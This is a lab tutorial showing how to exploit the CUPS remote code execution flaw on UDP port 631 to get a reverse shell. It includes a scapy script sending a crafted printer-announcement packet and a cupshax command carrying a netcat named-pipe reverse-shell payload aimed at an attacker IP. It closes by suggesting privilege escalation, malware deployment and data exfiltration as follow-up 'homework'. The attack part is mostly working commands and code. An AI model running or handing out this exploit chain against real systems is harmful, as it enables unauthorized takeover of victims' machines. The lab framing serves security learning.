Exploiting the CUPS Vulnerability and Gaining a Reverse Shell (9.9 CVSS)
Let’s start by introducing our readers to what CUPS (Common Unix Printing System) is and what they need to know to follow along with this Proof of Concept (PoC) post.
What is CUPS?
CUPS is a print server used on Linux and UNIX systems to manage printing jobs. It allows devices to communicate with printers over the network. However, when a vulnerability is found in a service like this, attackers can take advantage of it to gain unauthorized access.
Vulnerability Overview:
- Service: CUPS (Common UNIX Printing System)
- Port: UDP/631
- Vulnerability Type: Remote Code Execution (RCE)
- Impact: Attackers can execute arbitrary code on the target machine, potentially gaining control over the system.
Tools and Setup
To demonstrate the vulnerability, we’ll be using a few simple tools:
- Netcat (nc): A utility for reading and writing data across network connections. It allows us to send crafted print jobs to the CUPS server.
- PoC Python Script: A proof-of-concept script that exploits the CUPS vulnerability to send a malicious print job.
- You’ll also need two Linux Desktop VMS (Kali and Ubuntu)
Setting Up a CUPS Vulnerability Exploit Lab
Open your Kali and Ubuntu Desktop, make sure to run the ifconfig command one both side to get the IP Addresses of them since we’ll be using Ubuntu as the target machine and Kali as the attacker, we’ll be running al the scripts (PoC) exploit and all the tools on Kali while just printing a sample picture on the Ubuntu machine to gain fingerprints and reverse she
$ ifconfig → to get the IP address of the machine.
$ ping <target_ip> → to see if both machines have connectivity and are on the same network.
Once these two are established and have reliable connection, then we can run this simple script to see if everything is going work and we should be able to see fingerprints on the second terminal.
My target IP Address is: 192.168.1.190 (Ubuntu VM aka victim machine in this case.
I am going to ping from Kali to see make sure connection is reliable between them two. And it was successful, enough talking and now let’s get our hands dirty.
Create directory in Kali Linux called ‘staging’ for our porpuses so we can install all the tools/script for this and make sure to navegiate it, here how to do it using the terminal.
$ mkdir staging
$cd staging
Note: make sure to create in Linux (attacker machine)!
Now we’re going to create a simple python script to send a packet over the other machine to see if everything is working correctly like we mentioned before.
Navigate to the ‘staging’ directory that we create before, open your favorite text editor and type this code in there.
$ nano packet.py
“””
from scapy.all import *
packet = IP(dst=”192.168.1.190") / UDP(dport=631) / Raw(load=”0 3 http://192.168.1.144:1234/printers/whatever")
send(packet)
print(“Packet sent over to 192.168.1.190”)
“””
Lets explain everything in here:
from scapy.all import * → we are importing libraries from scapy. A Python-based interactive packet manipulation tool and library used for network traffic analysis, packet crafting, and testing of network protocols.
This line of code creates a custom network packet using Scapy. Here’s a simple breakdown:
packet = IP(dst=”192.168.1.190") / UDP(dport=631) / Raw(load=”0 3 http://192.168.1.144:1234/printers/whatever")
IP(dst="192.168.1.190")
: This part creates an IP packet with the destination set to the IP address 192.168.1.190.UDP(dport=631)
: Adds a UDP (User Datagram Protocol) layer with the destination port set to 631 (the default port for CUPS).Raw(load="0 3 http://192.168.1.144:1234/printers/whatever")
: Adds raw data to the packet. The data being sent is "0 3 http://192.168.1.144:1234/printers/whatever".
In simple terms, this is a UDP packet being sent to 192.168.1.190 on port 631 with a custom message in it.
send(packet)
: This sends the crafted packet (which was created earlier) over the network to the destination specified (in this case, to 192.168.1.190).print("Packet sent over to 192.168.1.190")
: After sending the packet, this prints a confirmation message to the screen saying "Packet sent over to 192.168.1.190" to let you know the packet has been successfully sent.
Lets clone this PoC tool from this GitHub page: https://github.com/RickdeJager/cupshax/ and clone to it our desktop (kali)
- git clone https://github.com/RickdeJager/cupshax.git ( make sure git is installed already!)
- navigate to the directory and type the following command.
- nc -lnvp 4444 (to listen)
- python3 cupshax.py — ip 192.168.1.144 — port 1444 — name “HP DeskJet 3755” — command “rm /tmp/f;mkfifo /t mp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.144 4444 >/tmp/f”
Switch back to the victim machine, which in our case is an Ubuntu desktop. In the search box, type “printer”. You should see a screen similar to the one shown in the image below.
and now double click the picture to print it, make sure appropriate printer is selected and we should get reverse shell.
As shown here, we gained a reverse shell from our victim machine (Ubuntu desktop) by simply printing the car’s picture from there. From this point, we could dive deeper into activities like privilege escalation to gain root access, deploying malware, or exfiltrating data from the machine. However, I’ll leave these as homework for you to explore further.
In Summary: We successfully sent a packet (message) to the victim machine and used a PoC tool (exploit) to gain a reverse shell. I hope you enjoyed following along with this process. Your feedback is always appreciated and welcome!
SOURCES:
- YouTube Video: https://www.youtube.com/watch?v=cixyRITXaOw
- GitHub Page: https://github.com/RickdeJager/cupshax/
- Reverse Shell Generator: https://www.revshells.com/